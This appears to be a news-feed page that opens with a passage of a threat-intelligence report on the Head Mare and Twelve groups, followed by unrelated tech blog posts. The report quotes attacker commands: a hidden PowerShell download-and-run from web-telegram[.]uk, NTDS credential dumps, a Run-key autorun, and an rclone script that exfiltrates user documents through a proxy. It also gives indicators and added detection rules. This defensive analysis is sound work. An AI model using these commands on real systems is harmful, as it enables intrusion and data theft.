The attackers used common system reconnaissance tools like quser.exe, tasklist.exe, and netstat.exe on local hosts. They primarily used fscan and SoftPerfect Network Scanner for local network reconnaissance, along with ADRecon, a tool for gathering information from Active Directory. ADRecon is a PowerShell script not previously observed in the group’s arsenal.

The attackers also used ADRecon to study the Active Directory domain, including computers, accounts, groups, and trust relationships between domains. The command history showed various domains passed as arguments to the script:
.\ADRecon.ps1 -DomainController <FQDN A>
.\ADRecon.ps1 -DomainController <FQDN B>
.\ADRecon.ps1 -DomainController <FQDN C>
<..>

Privilege Escalation


The attackers exploited previously compromised accounts of victims and their contractors, and created privileged local accounts, particularly when exploiting the business automation software server. If a user has sufficient permissions to remotely execute commands on the server, this software allows running a child command prompt process, such as cmd.exe, with privileges in the operating system corresponding to the program’s privileges. Since business automation software typically has administrator privileges in the OS, the child process also becomes privileged. The attackers exploited this opportunity: after gaining access to the vulnerable software server, they created a privileged local account on whose behalf they launched a command interpreter.

Command Execution


The attackers launched the Windows command interpreter on the business automation platform server in the target system within a process that executed the following command line:
cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt')) > $temp\v8_B5B0_11.txt
This command downloads and executes the vivo.txt file, which we were unable to obtain. However, based on system events, we suspect that it opened a reverse shell, which the operator used to create two files in the target system.
c:\programdata\microsoftdrive\mcdrive.vbs
c:\programdata\microsoftdrive\mcdrive.ps1
Then, using reg.exe, the attackers added an autorun entry to execute mcdrive.vbs with the interpreter wscript.exe.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "mcdrivesvc" /t REG_EXPAND_SZ /d "wscript.exe \"$appdata\MicrosoftDrive\mcdrive.vbs
The VBS file is an obfuscated Visual Basic script that creates a WScript.Shell COM object and uses its Run() method to execute an obfuscated command line.

A deobfuscated command line snippet follows:
%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -NonInteractive -NoProfile -w hidden -c iex ([System.IO.File]::ReadAllText('C:\ProgramData\MicrosoftDrive\mcdrive.ps1'))
This command reads the C:\ProgramData\MicrosoftDrive\mcdrive.ps1 file and executes it in the PowerShell interpreter. The file is a CobInt loader, previously seen only in Twelve's arsenal. mcdrive.ps1 determines the operating system's bitness, then decrypts and executes the payload, which initiates a request to the C2 server at 360nvidia[.]com. The image below shows a graph obtained from analysis in the Cloud Sandbox on our Threat Intelligence Portal.

Payload execution analysis graph. The IP address shown on the graph corresponds to the domain 360nvidia.com

Credential Access


The investigation identified tools for obtaining credentials. Besides the publicly available mimikatz utility, the attackers used secretsdump and ProcDump. Secretsdump was found on one victim’s system at the following paths:
[USERNAME]\Desktop\secretsdump.exe
[USERNAME]\Desktop\secretsdump (1).exe
A new Go-based sample named update.exe was also discovered; it dumps the ntds.dit file and the SYSTEM and SECURITY registry hives by invoking ntdsutil.exe:
powershell ntdsutil.exe "'ac i ntds'" 'ifm' "'create full temp'" q q
Additionally, manual PowerShell commands were observed for dumping data from these locations.
ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp1' q q
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
While no traces of the first command’s successful execution were found, the results of the second one were located at the following paths:
\temp\Active Directory
\temp\registry
\temp\Active Directory\ntds.dit
\temp\Active Directory\ntds.jfm
\temp\registry\SECURITY
\temp\registry\SYSTEM
\temp\[REDACTED].zip
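The commands quoted in the Anti-detection, Command Execution and Credential Access sections all survive in PowerShell history files, Sysmon event 1 or event 4688 command lines, and each has a stable shape that a rule can key on. The following set of rules is an added example, not part of the report: the sample lines are the commands quoted above plus two constructed benign lines that must not fire, and the tags are this example's own names.

```python
"""Command-line triage rules for the host artifacts quoted in this report (added example)."""
import re

RULES = [
    (r"clear-eventlog|wevtutil(?:\.exe)?\s+cl\b", "event log clearing"),
    (r"remove-service\b|\bsc(?:\.exe)?\s+delete\b", "service removal"),
    # powershell ... -ep/-ex bypass ... -w hidden ... iex
    (r"powershell(?:\.exe)?.*-e[px]\s+bypass.*-w(?:indowstyle)?\s+hidden.*\b(?:iex|invoke-expression)\b",
     "hidden PowerShell with bypassed policy feeding iex"),
    (r"downloadstring\(|downloadfile\(|invoke-webrequest|\biwr\b", "remote download in command line"),
    # Run key pointing at a script host rather than an application
    (r"reg(?:\.exe)?\s+add\s+\S*\\currentversion\\run\b.*\b(?:wscript|cscript|mshta|powershell)",
     "Run-key autorun of a script host"),
    (r"ntdsutil.*\bifm\b.*create\s+full", "NTDS IFM dump (ntds.dit + SYSTEM/SECURITY)"),
]
COMPILED = [(re.compile(p, re.I | re.S), tag) for p, tag in RULES]


def normalise(line):
    """Collapse the line wrapping and stray whitespace seen in history files."""
    return " ".join(line.split())


def triage(line):
    """Return the tags of every rule that matches the command line, in rule order."""
    text = normalise(line)
    return [tag for rx, tag in COMPILED if rx.search(text)]


SAMPLE_LINES = [
    # quoted from the report
    "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }",
    "remove-service -name winsw",
    "sc delete winsw",
    r"cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt')) > $temp\v8_B5B0_11.txt",
    r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "mcdrivesvc" /t REG_EXPAND_SZ /d "wscript.exe \"$appdata\MicrosoftDrive\mcdrive.vbs',
    r"%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -NonInteractive -NoProfile -w hidden -c iex ([System.IO.File]::ReadAllText('C:\ProgramData\MicrosoftDrive\mcdrive.ps1'))",
    r'''powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"''',
    # constructed benign lines
    "Get-Service -Name Spooler",
    r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /d "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"',
]


def run_sample():
    """Map each sample line to the tags it triggers."""
    return {line: triage(line) for line in SAMPLE_LINES}


if __name__ == "__main__":
    for line, tags in run_sample().items():
        print(tags or ["-"], line[:70])
```

The Run-key rule is deliberately narrow (it only fires when the value launches a script host), which is what keeps the constructed OneDrive entry quiet; widening it to any Run-key write trades that precision for noise on every software install.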

Lateral Movement


The attackers used RDP to connect to systems, including with privileged accounts. They connected to NAS servers via SSH and used tools like mRemoteNG, smbexec, wmiexec, PAExec, and PsExec for remote host communication.

Data Collection and Exfiltration


Another new tool in Head Mare's arsenal was a script that runs wusa.exe. Normally, this file name belongs to the legitimate Windows Update Standalone Installer. However, the script's launch parameters showed that the file was actually the rclone.exe utility. Rclone is an open-source tool for copying and synchronizing files between storage back ends of different types, which makes it convenient for data transfer.
@echo off
setlocal enabledelayedexpansion
set inputFile=C:\ProgramData\1.txt
for /f "tokens=*" %%A in (%inputFile%) do (
set hostname=%%A
start /wait "" C:\ProgramData\wusa.exe --config="C:\ProgramData\1.conf" --sftp-socks-proxy <username>:<password>@64.7.198.109:80 sync "\\%%A\C$\Users" sftpP:/data/<path> -q --ignore-existing --auto-confirm --include "*.doc" --include "*.docx" --include "*Desktop/**" --include "*Documents/**" --include "*Downloads/**" --include "*.pdf" --include "*.xls" --include "*.xlsx" --include "*.zip" --include "*.rar" --include "*.txt" --include "*.pn*" --include "*.ppt" --include "*.pptx" --include "*.jp*" --include "*.eml" --include "*.pst" --multi-thread-streams 12 --transfers 12 --max-age 3y --max-size 1G
)
endlocal
The script takes the file 1.txt as input, which contains a list of hosts. For each host, it runs rclone.exe (as wusa.exe) to copy files from the host's C$\Users share to an SFTP server through a SOCKS proxy. Only files under the Desktop, Documents and Downloads directories, or files anywhere in the user profiles matching the extension patterns in the include list, no older than three years and no larger than 1 GiB, were exfiltrated; --ignore-existing skips files already present on the server, so repeated runs only pick up new material.
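Which files on a host were actually in scope follows from the rclone filter semantics, and it is worth replaying them rather than eyeballing the include list: a rule such as "*Desktop/**" collects everything under a Desktop directory whatever its extension, while "*.doc" matches at any depth but not "*.docx". The following is an added example, not the attackers' script: it parses the include, size and age options out of the command line quoted above and applies rclone's documented glob rules ("*" stays within one path element, "**" crosses directories, a pattern without a leading "/" matches from any path-element boundary, --include implies excluding everything else, 1G is 1 GiB, a year is 365.25 days) to a constructed file listing with a constructed clock.

```python
"""What the rclone job above would actually collect (added example)."""
import re
from datetime import datetime, timedelta, timezone

# Argument string from the batch script in the report, placeholders kept as they are.
RCLONE_CMDLINE = (
    r'C:\ProgramData\wusa.exe --config="C:\ProgramData\1.conf" '
    r'--sftp-socks-proxy <username>:<password>@64.7.198.109:80 sync "\\HOST\C$\Users" sftpP:/data/<path> '
    r'-q --ignore-existing --auto-confirm --include "*.doc" --include "*.docx" --include "*Desktop/**" '
    r'--include "*Documents/**" --include "*Downloads/**" --include "*.pdf" --include "*.xls" --include "*.xlsx" '
    r'--include "*.zip" --include "*.rar" --include "*.txt" --include "*.pn*" --include "*.ppt" --include "*.pptx" '
    r'--include "*.jp*" --include "*.eml" --include "*.pst" --multi-thread-streams 12 --transfers 12 '
    r'--max-age 3y --max-size 1G'
)

SIZE_UNITS = {"": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3, "T": 1024 ** 4}  # rclone uses binary units
AGE_DAYS = {"d": 1, "w": 7, "M": 30.4375, "y": 365.25}                          # rclone duration suffixes


def parse_rclone(cmdline):
    """Pull the fields an analyst needs out of an rclone command line."""
    proxy = re.search(r"--sftp-socks-proxy\s+(?:\S+@)?([\w.-]+):(\d+)", cmdline)
    size = re.search(r"--max-size\s+(\d+)([KMGT]?)", cmdline)
    age = re.search(r"--max-age\s+(\d+)([dwMy])", cmdline)
    return {
        "includes": re.findall(r'--include\s+"([^"]+)"', cmdline),
        "proxy": (proxy.group(1), int(proxy.group(2))) if proxy else None,
        "max_size": int(size.group(1)) * SIZE_UNITS[size.group(2)] if size else None,
        "max_age": timedelta(days=int(age.group(1)) * AGE_DAYS[age.group(2)]) if age else None,
    }


def glob_to_regex(pattern):
    """rclone filter glob -> compiled regex over '/'-separated relative paths."""
    anchored = pattern.startswith("/")
    body = pattern.lstrip("/")
    out, i = "", 0
    while i < len(body):
        if body.startswith("**", i):
            out += ".*"          # ** crosses directory boundaries
            i += 2
            continue
        ch = body[i]
        out += "[^/]*" if ch == "*" else "[^/]" if ch == "?" else re.escape(ch)
        i += 1
    return re.compile(("^" if anchored else "^(?:.*/)?") + out + "$")


def in_scope(files, opts, now):
    """files: iterable of (relative_path, size_bytes, mtime). Returns the paths rclone would transfer."""
    rules = [glob_to_regex(p) for p in opts["includes"]]
    chosen = []
    for path, size, mtime in files:
        if opts["max_size"] is not None and size > opts["max_size"]:
            continue
        if opts["max_age"] is not None and now - mtime > opts["max_age"]:
            continue
        if any(r.match(path) for r in rules):   # --include implies "exclude everything else"
            chosen.append(path)
    return chosen


# Constructed listing under \\HOST\C$\Users and a constructed clock.
NOW = datetime(2025, 3, 1, tzinfo=timezone.utc)
SAMPLE_FILES = [
    ("alice/Desktop/plans.exe", 10_000, NOW - timedelta(days=30)),        # under Desktop: any extension goes
    ("alice/Work/contract.doc", 4_000, NOW - timedelta(days=100)),        # "*.doc"
    ("alice/Work/tool.exe", 4_000, NOW - timedelta(days=1)),              # no include matches
    ("alice/Pictures/holiday.jpg", 2_000_000, NOW - timedelta(days=10)),  # "*.jp*"
    ("alice/Music/old.pdf", 500, NOW - timedelta(days=4 * 366)),          # older than 3y
    ("alice/Archive/backup.zip", 3 * 1024 ** 3, NOW - timedelta(days=1)), # over 1 GiB
    ("alice/AppData/Local/Temp/x.tmp", 100, NOW - timedelta(days=1)),
]


def demo():
    return in_scope(SAMPLE_FILES, parse_rclone(RCLONE_CMDLINE), NOW)


if __name__ == "__main__":
    print(parse_rclone(RCLONE_CMDLINE)["proxy"])
    print(demo())
```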

Final goal: file encryption


As in previous attacks, they encrypted data using variants of LockBit 3.0 (for Windows systems) and Babuk (for NAS devices). The investigation found that the LockBit file was initially saved on the victim’s host at the following paths:

  • C:\Users\{username}\Desktop\locker.exe;
  • C:\Windows\SYSVOL\Intel\locker.exe.

Below is a sample ransom note, with the cybercriminals’ contacts redacted:

Contents of a LockBit ransom note

Connection between Head Mare and Twelve


In addition to the aforementioned TTPs, we attribute these attacks to Head Mare based on the following characteristics:

  1. A previously seen IP address:
    • 45.156.21[.]148


  2. Malware:
    • PhantomJitter


Further details about these indicators can be found in the private report on the Threat Intelligence Portal: “HeadMare’s new PhantomJitter backdoor dropped in attacks exploiting Microsoft Exchange”.

However, the presence of Twelve’s tools like CobInt suggests collaboration. To test this hypothesis, activity cluster diagrams were created based on the Diamond Model framework. Overlaps – common elements in the tactics of both groups – are highlighted in red, indicating potential coordination.

Analysis of the Head Mare techniques and tools

In the image above, we see for the first time the use of the CobInt malware in Head Mare attacks. Previously, it was present only in the arsenal of the Twelve group, the analysis of which is presented below.

Analysis of the Twelve techniques and tools

Also, the analysis of the two models revealed overlaps in the infrastructure (C2s) of the groups. The following infrastructure elements appearing in Head Mare attacks were also present in a number of incidents related to the activities of the Twelve group.

  • 360nvidia[.]com;
  • 45.156.27[.]115

In addition, we have identified other similarities in the arsenal of the two groups:

  1. File names:
    • proxy.ps1
    • ad_without_dc.ps1


  2. Paths:
    • C:\Windows\System32\winsw.exe
    • C:\Windows\System32\winsws.exe
    • C:\Windows\System32\winuac.exe


  3. Service names:
    • winsw (Microsoft Windows Update)
    • winuac (Microsoft UAC Service Wrapper)


  4. Victims:
    • Manufacturing, government, energy


The final intersection points of the Head Mare and Twelve groups are shown in the image below. Given the overlaps in infrastructure, TTPs, CobInt malware, and victim choices, we assume that these groups act together, exchanging access to command-and-control servers and various tools for carrying out attacks.

Overlaps in TTPs, tools, and infrastructure between Head Mare and Twelve

Conclusion


Head Mare is actively expanding its set of techniques and tools. In recent attacks, they gained initial access to the target infrastructure by not only using phishing emails with exploits but also by compromising contractors.

They also use tools previously seen in attacks by other groups, such as Twelve’s CobInt backdoor.

This is not the only similarity between the two groups. In addition to the toolkit, the following were noticed:

  • Shared command-and-control servers: 360nvidia[.]com, 45.156.27[.]115
  • PowerShell scripts accessing these C2 servers: mcdrive.ps1
  • Scripts for tunneling network connections: proxy.ps1

Based on the factors described above, we assume that Head Mare is working with Twelve to launch attacks on state- and privately controlled companies in Russia. We will continue to monitor the activity of the attackers and share up-to-date information about their TTPs. More details about the hacktivists’ activities and their tools, such as PhantomJitter, can be found in the materials available to subscribers of our Threat Intelligence reports.

Indicators of compromise


Please note: the network addresses given in this section were valid at the time of publication but may become outdated in the future.

Hashes (MD5):

6008E6C3DEAA08FB420D5EFD469590C6  ADRecon.ps1
09BCFE1CCF2E199A92281AADE0F01CAF  calc.exe, c.exe
70C964B9AEAC25BC97055030A1CFB58A  locker.exe
87EECDCF34466A5945B475342ED6BCF2  mcdrive.vbs
E930B05EFE23891D19BC354A4209BE3E  mimikatz.exe
C21C5DD2C7FF2E4BADBED32D35C891E6  proxy.ps1
96EC8798BBA011D5BE952E0E6398795D  secretsdump.exe, secretsdump (1).exe
D6B07E541563354DF9E57FC78014A1DC  update.exe

File paths:
C:\Windows\SYSVOL\Intel\locker.exe
C:\ProgramData\MicrosoftDrive\mcdrive.ps1
C:\ProgramData\MicrosoftDrive\mcdrive.vbs
C:\ProgramData\proxy.ps1
C:\ProgramData\wusa.exe
C:\Users\{USERNAME}\AppData\Roaming\1.bat
C:\Users\{USERNAME}\AppData\Roaming\Microsoft\Windows\Recent\mimikatz.lnk
C:\Users\{USERNAME}\AppData\Roaming\proxy.ps1
C:\Users\{USERNAME}\Desktop\Обработка.epf
C:\Users\{USERNAME}\Desktop\ad_without_dc.ps1
C:\Users\{USERNAME}\Desktop\ADRecon.ps1
C:\Users\{USERNAME}\Desktop\h.txt
C:\Users\{USERNAME}\Desktop\locker.exe
C:\Users\{USERNAME}\Desktop\mimikatz.exe
C:\Users\{USERNAME}\Desktop\mimikatz.log
C:\Users\{USERNAME}\Desktop\secretsdump (1).exe
C:\Users\{USERNAME}\Desktop\secretsdump.exe
C:\Users\{USERNAME}\Downloads\mimikatz-master.zip
C:\users\{USERNAME}\log.exe
C:\windows\adfs\ar\update.exe
C:\windows\system32\inetsrv\c.exe
C:\windows\system32\inetsrv\calc.exe
C:\windows\system32\winsw.exe
C:\Windows\System32\winsws.exe
C:\windows\system32\winuac.exe
C:\Windows\SYSVOL\Intel\mimikatz.exe

IP addresses and domain names:
360nvidia[.]com
web-telegram[.]uk
45.156.27[.]115
45.156.21[.]148
185.229.9[.]27
45.87.246[.]34
185.158.248[.]107
64.7.198[.]109


securelist.com/head-mare-twelv…


Kids, Ready for the RHC Conference Workshops? Let's Explore Deepfakes, AI, the Dark Web, Ethical Hacking, Doxing and Cyberbullying Together


On Thursday, 8 May, the Red Hot Cyber Conference 2025 will host a full day dedicated to young people with Hands-on Workshops (organized in collaboration with Accenture Italia). It is a unique, free opportunity to dive into the world of cybersecurity and technology in a practical, interactive way. Given the crowd that packed the conference during last year's workshops, this year the workshops will be held inside the theatre, which seats a full 800.

The event will take place in Rome at the Teatro Italia, with reception starting at 11:00 so that school groups travelling from outside Rome can arrive in time. The Teatro Italia is only a 20-minute walk from Termini station and 6 minutes on foot from the Piazza Bologna stop on Metro line B (about 600 metres).

The workshops start at 11:30. The day is dedicated to middle school, high school and university students, and simply to anyone curious who wants to dive into technology and cybersecurity in a practical, interactive and engaging way.

Free registration for the workshops on Thursday, 8 May

How we will do it


Not just words, but direct experience! Through immersive technical sessions, participants will have the chance to see first-hand how ethical hackers test a website for vulnerabilities, how artificial intelligence can be used to recognize objects or analyze deepfakes, and how to tackle specific cybersecurity problems. They will also explore the Dark Web safely, learning about the importance of Open Source Intelligence (OSINT) and Cyber Threat Intelligence, and discuss doxing and cyberbullying.

The initiative is "hands-on". In computing, "hands-on" refers to a practical, concrete approach to learning or carrying out specific tasks: actually manipulating, experimenting with or applying knowledge or skills in a practical setting rather than stopping at a theoretical or abstract understanding.

Bring your laptop with whatever operating system you prefer, so you can take part in the exercises alongside our experts. If you miss a step, no problem: all the workshops will be recorded and made available on our YouTube channel, so you can watch them again whenever you like, just as in previous years.

Hands-on workshops of 2024 at the Red Hot Cyber Conference 2024

An Interactive, Practical Experience


The goal is therefore not just "passive" but above all "active": to let young people get their hands on something they have always seen in films and thought out of reach, sparking in their eager minds an interest in subjects nobody has ever let them try up close.

Unlike previous editions, the workshops will be concentrated entirely on 8 May and will give participants the chance to try the most innovative technologies first-hand in several practical sessions.

Bring your laptop! In some of these workshops you will be able to get hands-on right away and practise what you have learned, guided by industry experts.


Programme of the Day


Below is the detailed programme of the workshops to be held on Thursday, 8 May (also available in the full conference programme):

Why Attend?


  • Practical experience: not just theory, but concrete exercises to improve your skills.
  • Industry experts: sessions led by highly qualified professionals.
  • Unique insights: crucial topics such as ethical hacking, privacy, artificial intelligence and cyberbullying.
  • Networking: an opportunity to connect with other cybersecurity enthusiasts.


Register Now!


Entry to the Hands-on Workshops requires a separate registration from the conference. Book your place here: rhc-conference-2025-workshop.e…

Don't miss this chance to learn, experiment and test yourself in the world of cybersecurity! See you on Thursday, 8 May in Rome!

The article "Kids, Ready for the RHC Conference Workshops? Let's Explore Deepfakes, AI, the Dark Web, Ethical Hacking, Doxing and Cyberbullying Together" originally appeared on the Red Hot Cyber blog.


A Decade Resistance Box From PCBs


One of those useful things to have around on your bench is a decade resistance box, essentially a dial-a-resistance instrument. They used to be quite expensive in line with the cost of close-tolerance resistors, but the prices have come down and it’s within reach to build your own. Electronic design consultancy Dekimo have a nice design for one made from a series of PCBs which they normally give out at trade fairs, but now they’ve released the files for download.

It’s released as Gerbers and BOM with a pick-and-place file only, and there’s no licence so it’s free-as-in-beer, but that should be enough if you fancy a go. Our Gerber viewer is playing up so we’re not entirely sure how reliable using PCBs as wafer switches will be long-term, but since the pictures are all ENIG boards we’d guess the gold plating will be much better than the HASL on all those cheap multimeters.

We like this as a conference giveaway; being used to badges, it's refreshing to see a passive take on PCB artwork. Meanwhile, this isn't the first resistance box we've seen with unconventional switches.


hackaday.com/2025/03/13/a-deca…


NightSpire Arrives! A New Actor in the Ransomware Landscape


During the reconnaissance of the underground and of criminal groups carried out by DarkLab, Red Hot Cyber's threat intelligence laboratory, we came across the Data Leak Site of a cyber gang never monitored before: NightSpire.

It is a new ransomware group that appears to have surfaced on the cybercrime scene only recently. Although there is no prior information about this actor, analysis of their data leak site (DLS) and of their communications provides some key clues about their strategy and operating methods.

The group describes itself as an unstoppable threat to companies and promises to exploit every vulnerability to its advantage. Below we analyze the details of their portal and the possible implications of their activity.

NightSpire: Identity and Public Statements


The "About" section of NightSpire's site contains an intimidating message, typical of ransomware groups seeking to spread fear among companies. The language echoes that of well-known actors such as BlackCat, LockBit and Conti, underlining their intention to hit vulnerable organizations and threaten them to obtain a ransom.

Text from the "About" section:
"NightSpire, the shadow architects of digital chaos, thrive on destroying the sanctity of corporate fortresses. With ruthless precision, we infiltrate the deepest data repositories, leaving no byte untouched. Fear us, for NightSpire is the herald of your downfall, the invisible hand that will exploit your every vulnerability until you kneel before our demands."

This rhetoric is a clear sign of cyber-intimidation, aimed at reinforcing the group's image as an unstoppable threat and destabilizing victims.

Analysis of the Data Leak Site (DLS)


NightSpire uses a data leak site to publish information about compromised companies, a modus operandi now common among ransomware groups. The portal has a "Databases" section listing the victims, with details on:

  • Date of the attack
  • Date the leak was published
  • Size of the exfiltrated data
  • Victim's country

From the images analyzed, some of the affected companies can be seen:

Some of these leaks are still counting down, suggesting the group follows a double extortion strategy: it threatens to publish the stolen data if the ransom is not paid. When the timer reaches zero, the data is made public.

This technique is used to put further pressure on victims, pushing them to pay in order to avoid reputational damage and the loss of sensitive data.

Contact Structure and Telegram Channel


NightSpire offers several contact methods on its dedicated page. Besides the usual email addresses on ProtonMail and OnionMail, they also have a Telegram channel, often used by ransomware groups to post updates on leaks, negotiate ransoms and give instructions to victims.

Contact methods identified:


  • Email
  • Contact form
  • Telegram

The Telegram channel is probably used to announce new attacks, interact with victims and manage communications with potential affiliates or data sellers.

Characterization of the Group


Although there is no detailed information yet on their origin or attack techniques, some elements suggest that NightSpire may be an emerging group strongly influenced by existing RaaS (Ransomware-as-a-Service) models.

Possible operational characteristics:

  • Use of double extortion
  • DLS portal with a countdown timer for data release
  • Telegram channel for communications
  • Targets companies across several global regions
  • Aesthetics and communication similar to advanced ransomware groups

Whether this is a new independent group or a rebrand of an existing actor remains to be determined.

Conclusions and Final Considerations


NightSpire presents itself as a new threat in the ransomware landscape. The absence of references to pre-existing groups makes it difficult to draw a direct line to known actors, but their modus operandi is clearly inspired by proven techniques.

Companies must adopt cyber resilience strategies: strengthening endpoint protection, implementing incident response plans and improving staff training to mitigate the risk of compromise.

We will continue to monitor NightSpire to identify their tactics and operating procedures and to assess their impact on global cybercrime.

The article "NightSpire Arrives! A New Actor in the Ransomware Landscape" originally appeared on the Red Hot Cyber blog.


Meshtastic Adds Wireless Connectivity to Possum Trap


Perhaps every gardener who has tried to grow a tomato, lettuce or bean has had to contend with animals trying to enjoy the food before the gardener can, whether a groundhog, rabbit, mouse, crow or even an iguana. There are numerous ways to discourage these mischievous animals from foraging in the garden beds, including traps, but those devices have their downsides as well. False alarms are a problem, as is trapping animals that will be overly aggravated to find themselves inside the trap (like skunks). While the latter can't easily be solved by technology, the former can, with the help of Meshtastic.

[Norman Jester]’s problem was an errant possum, but these nocturnal animals generally come out while humans are asleep, and other nighttime animals like rats can activate the trap and then escape. To help with this, a Meshtastic node was added to the San Diego mesh using a 3.5mm audio jack as a detector. When the trap is activated, the closing door yanks a plug out of the jack, alerting the node that the trap has been closed. If it’s a false alarm the trap can be easily and quickly reset, and if a possum has found its way in then it can be transported to a more suitable home the next day.

It's worth noting that American possums (distinct from the Australian animals of the same name) are an often-misunderstood animal that generally does more good than harm. They help to control Lyme disease, eat a lot of waste that other animals won't, don't spread rabies, and don't cause nearly as much disruption to human life as other animals like feral cats or raccoons. But if one is upsetting a garden, or another type of animal is causing a disturbance, this Meshtastic solution does help solve some of the problems with live traps. For smaller animals, though, take a look at this Arduino-powered trap instead.

Thanks to [Dadsrcworkbench] for the tip!

youtube.com/embed/prx-Bxpf7RU?…


hackaday.com/2025/03/12/meshta…


A Fast Rewind to the Era of Tapesponding


Newspaper clipping with words 'speaking personally' and a photo

Imagine a time before Discord servers and cheap long-distance calls. Back in the 1950s, a curious and crafty group of enthusiasts invented their own global social network: on reels of magnetic tape. They called it tapesponding (short for tape corresponding), and it was a booming hobby for thousands of radio hams, tinkerers, and audio geeks. Here’s the original video on this analog marvel.

These folks weren't just swapping mixtapes. They crafted personal audio letters, beamed across the globe on 3-inch reels. DIY clubs emerged everywhere: World Tape Pals (Texas-based, naturally) clocked 5,000 members from "every Free Nation", a phrasing that frames the hobby in the East-vs-West terms of its era. Some groups even pooled funds to buy shared tape decks in poorer regions, pure hacker spirit. The tech behind it: speeds of 3¾ IPS, half-track mono, round-robin reels, and rigorous trust networks to avoid ghosters. Honestly, it makes IRC net ops look soft. Tapesponding wasn't just for chatty types. It fostered deep friendships, even marriages. It was social engineering before that term was coined. The video is below the break.

What are your thoughts on this nostalgic way of long-distance communication? The warm whirring of a spinning tape reel? The waiting time before your echo is returned? Or have you skipped all the analog mechanics and shouted into the LoRaWAN void long ago?

youtube.com/embed/4t9H14XfkPc?…


hackaday.com/2025/03/12/a-fast…


EPROM-based Enigma Machine


The Enigma machine is perhaps one of the most legendary devices to come out of World War II. The Germans used the ingenious cryptographic device to hide their communications from the Allies, who in turn spent an incredible amount of time and energy in finding a way to break it. While the original Enigma was a complicated electromechanical contraption, [DrMattRegan] recently set out to show how its operation can be replicated with an EPROM.

The German Enigma machine was, for the time, an extremely robust way of coding messages. Earlier versions proved somewhat easy to crack, but subsequent machines added more and more complexity rendering them almost impenetrable. The basis of the system was a set of rotors which encrypted each typed letter to a different one based on the settings and then advanced one place in their rotation, ensuring each letter was encrypted differently than the last. Essentially this is a finite-state machine, something perfectly suited for an EPROM. With all of the possible combinations programmed in advance, an initial rotor setting can be inputted, and then each key press is sent through the Enigma emulator which encrypts the letter, virtually advances the rotors, and then moves to the next letter with each clock cycle.
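The finite-state view in the paragraph above is easiest to see with the state made explicit: the state is the three rotor positions, each keypress first advances the state (the right rotor always, the others at their turnover notches, including the middle rotor's double step) and then maps one letter through the rotors, the reflector and back. The simulator below is an added example, not [DrMattRegan]'s EPROM design or code. It uses the historical Enigma I wirings for rotors I, II and III and reflector B; ring settings and the plugboard are left at their neutral values to keep it short.

```python
"""Enigma I as a finite-state machine (added example)."""

A = ord("A")
ROTORS = {  # wiring, turnover notch (letter in the window when the next keypress carries)
    "I":   ("EKMFLGDQVZNTOWYHXUSPAIBRCJ", "Q"),
    "II":  ("AJDKSIRUXBLHWTMCQGZNPYFVOE", "E"),
    "III": ("BDFHJLCPRTXVZNYEIWGAKMUSQO", "V"),
}
REFLECTOR_B = "YRUHQSLDPXNGOKMIEBFZCWVJAT"


class Rotor:
    def __init__(self, name, position="A"):
        wiring, notch = ROTORS[name]
        self.fwd = [ord(c) - A for c in wiring]
        self.bwd = [0] * 26
        for i, o in enumerate(self.fwd):      # inverse wiring for the return pass
            self.bwd[o] = i
        self.notch = ord(notch) - A
        self.pos = ord(position) - A

    def at_notch(self):
        return self.pos == self.notch

    def step(self):
        self.pos = (self.pos + 1) % 26

    def forward(self, c):   # right-to-left pass, entering at the rotor's current offset
        return (self.fwd[(c + self.pos) % 26] - self.pos) % 26

    def backward(self, c):  # return pass after the reflector, through the inverse wiring
        return (self.bwd[(c + self.pos) % 26] - self.pos) % 26


class Enigma:
    def __init__(self, rotors=("I", "II", "III"), positions="AAA"):
        self.left, self.middle, self.right = [Rotor(n, p) for n, p in zip(rotors, positions)]

    def _advance(self):
        """State transition taken before each letter is encrypted."""
        if self.middle.at_notch():          # double step: the middle rotor carries the left and itself
            self.middle.step()
            self.left.step()
        elif self.right.at_notch():         # right rotor at its notch carries the middle
            self.middle.step()
        self.right.step()                   # the right rotor moves on every keypress

    def press(self, ch):
        self._advance()
        c = ord(ch.upper()) - A
        for r in (self.right, self.middle, self.left):
            c = r.forward(c)
        c = ord(REFLECTOR_B[c]) - A
        for r in (self.left, self.middle, self.right):
            c = r.backward(c)
        return chr(c + A)

    def state(self):
        """The letters visible in the three windows, left to right."""
        return "".join(chr(r.pos + A) for r in (self.left, self.middle, self.right))

    def process(self, text):
        """Encrypt or decrypt: the machine is its own inverse from the same start state."""
        return "".join(self.press(ch) for ch in text if ch.isalpha())


if __name__ == "__main__":
    m = Enigma()
    print(m.process("AAAAA"), m.state())   # BDZGO AAF
```

The reflector is why no letter ever encrypts to itself, the weakness the bombe exploited, and the double-step rule is why the middle rotor's period is not a clean 26: a lookup-table implementation such as the EPROM has to encode exactly these transitions.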

[DrMattRegan]'s video, also linked below, goes into much more historical and technical detail on how these machines worked, as well as some background on the British bombe, an electromechanical device used to recover the daily Enigma settings. Colossus, the first programmable electronic digital computer, was also built at Bletchley Park during the war, though it targeted the German Lorenz teleprinter cipher rather than Enigma, demonstrating yet another technology that came to the forefront during WWII.

youtube.com/embed/yKOzgzsezyc?…

Thanks to [Clint] for the tip!


hackaday.com/2025/03/12/eprom-…